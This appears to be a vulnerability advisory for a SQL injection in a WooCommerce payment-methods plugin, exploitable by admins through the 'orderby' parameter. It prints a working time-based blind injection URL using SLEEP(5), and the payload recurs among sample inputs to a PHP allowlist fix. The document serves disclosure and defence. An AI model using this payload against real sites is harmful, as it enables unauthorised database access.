EPSS Percentile: 44.8%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
https://example.com/wp-admin/admin.php?page=wcpma-payment-settings&action=wcpma_view_list&orderby=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)
bulletin.iese.de/post/conditional-payment-methods-for-woocommerce_1-0/
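
The request above carries the injected expression in `orderby`, a sort parameter that ends up in the SQL text as an identifier rather than a quoted value. As an added example (not the plugin's code and not its actual fix), the sketch below resolves such a parameter through an allowlist so that request data is never copied into the statement. The function name, constant name, and column names are hypothetical.

```php
<?php
// Added example: hypothetical names throughout; not the plugin's source code.

// Allowlist: accepted request value => real column name (column names are assumed).
const WCPMA_SORTABLE = [
    'id'      => 'id',
    'title'   => 'title',
    'created' => 'created_at',
];

/**
 * Build an ORDER BY clause from untrusted query parameters.
 * A sort column is an identifier, so value quoting does not protect it;
 * anything outside the allowlist falls back to the default column.
 */
function wcpma_order_clause(array $query): string
{
    // Reject non-string input (e.g. orderby[]=x) before any lookup.
    $key = isset($query['orderby']) && is_string($query['orderby'])
        ? strtolower($query['orderby'])
        : '';
    $column = WCPMA_SORTABLE[$key] ?? 'id';

    $dir = isset($query['order']) && is_string($query['order'])
        ? strtoupper($query['order'])
        : '';
    $direction = in_array($dir, ['ASC', 'DESC'], true) ? $dir : 'ASC';

    // Only constants from this file reach the SQL text.
    return "ORDER BY `{$column}` {$direction}";
}

// Constructed inputs: a normal sort, the decoded orderby value from the
// request shown above, and an array-typed parameter.
$samples = [
    ['orderby' => 'title', 'order' => 'desc'],
    ['orderby' => '1 AND (SELECT 7394 FROM (SELECT(SLEEP(5)))UrUZ)'],
    ['orderby' => ['title']],
];
foreach ($samples as $q) {
    echo wcpma_order_clause($q), PHP_EOL;
}
```

Any value in the rest of the query (filters, limits) would still go through `$wpdb->prepare()` placeholders; the allowlist covers only the parts that cannot be parameterised as values.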